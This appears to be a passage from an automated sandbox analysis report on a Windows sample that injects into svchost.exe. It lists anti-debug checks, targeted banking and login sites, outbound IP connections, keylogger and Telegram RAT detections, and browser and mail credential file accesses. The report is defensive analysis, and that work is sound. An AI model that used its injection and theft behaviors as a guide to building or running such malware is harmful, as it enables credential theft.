Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599077	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598968	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598745	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598421	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597546	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597218	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596671	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596338	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595796	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595468	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594921	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594593	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594484	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594374	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594265	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594156	Jump to behavior

Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: svchost.exe, 00000002.00000002.3933512000.000000000326B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h

Source: C:\Users\user\Desktop\lsc5QN46NH.exe	API call chain: ExitProcess graph end node	graph_0-101258
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	API call chain: ExitProcess graph end node	graph_0-101034
Source: C:\Windows\SysWOW64\svchost.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_09049578 LdrInitializeThunk,

2_2_09049578

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_00673F09 BlockInput,

0_2_00673F09

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_00603B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00603B3A

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_00635A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00635A7C

Source: C:\Windows\SysWOW64\svchost.exe

2_2_004019F0

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_00604B37 LoadLibraryA,GetProcAddress,

0_2_00604B37

Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_01645260 mov eax, dword ptr fs:[00000030h]	0_2_01645260
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_01645200 mov eax, dword ptr fs:[00000030h]	0_2_01645200
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_01643BD0 mov eax, dword ptr fs:[00000030h]	0_2_01643BD0

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_006580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_006580A9

Source: C:\Windows\SysWOW64\svchost.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_0062A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0062A155
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_0062A124 SetUnhandledExceptionFilter,	0_2_0062A124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0040CE09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0040E61C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00416F6A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004123F1 SetUnhandledExceptionFilter,	2_2_004123F1

Source: C:\Windows\SysWOW64\svchost.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 193.122.130.0 80	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.21.80.1 443	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 149.154.167.220 443	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2EAB008

Jump to behavior

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_006587B1 LogonUserW,

0_2_006587B1

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_00603B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00603B3A

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_006048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_006048D7

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_00664C7F mouse_event,

0_2_00664C7F

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\lsc5QN46NH.exe"

Jump to behavior

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_00657CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00657CAF

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_0065874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_0065874B

Source: lsc5QN46NH.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: lsc5QN46NH.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_0062862B cpuid

0_2_0062862B

Source: C:\Windows\SysWOW64\svchost.exe

Code function: GetLocaleInfoA,

2_2_00417A20

Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_00634E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00634E87

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_00641E06 GetUserNameW,

0_2_00641E06

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_00633F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00633F3A

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_006049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_006049A0

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000002.00000002.3934335927.0000000005341000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 2.2.svchost.exe.7c00f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7c00000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326b000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7c00000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7ca0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326bf20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326bf20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326b000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7ca0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7c00f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6012, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 2.2.svchost.exe.7c00f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7c00000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326b000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7c00000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7ca0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326bf20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326bf20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.326b000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7ca0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7c00f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6012, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: lsc5QN46NH.exe	Binary or memory string: WIN_81
Source: lsc5QN46NH.exe	Binary or memory string: WIN_XP
Source: lsc5QN46NH.exe	Binary or memory string: WIN_XPe
Source: lsc5QN46NH.exe	Binary or memory string: WIN_VISTA
Source: lsc5QN46NH.exe	Binary or memory string: WIN_7
Source: lsc5QN46NH.exe	Binary or memory string: WIN_8
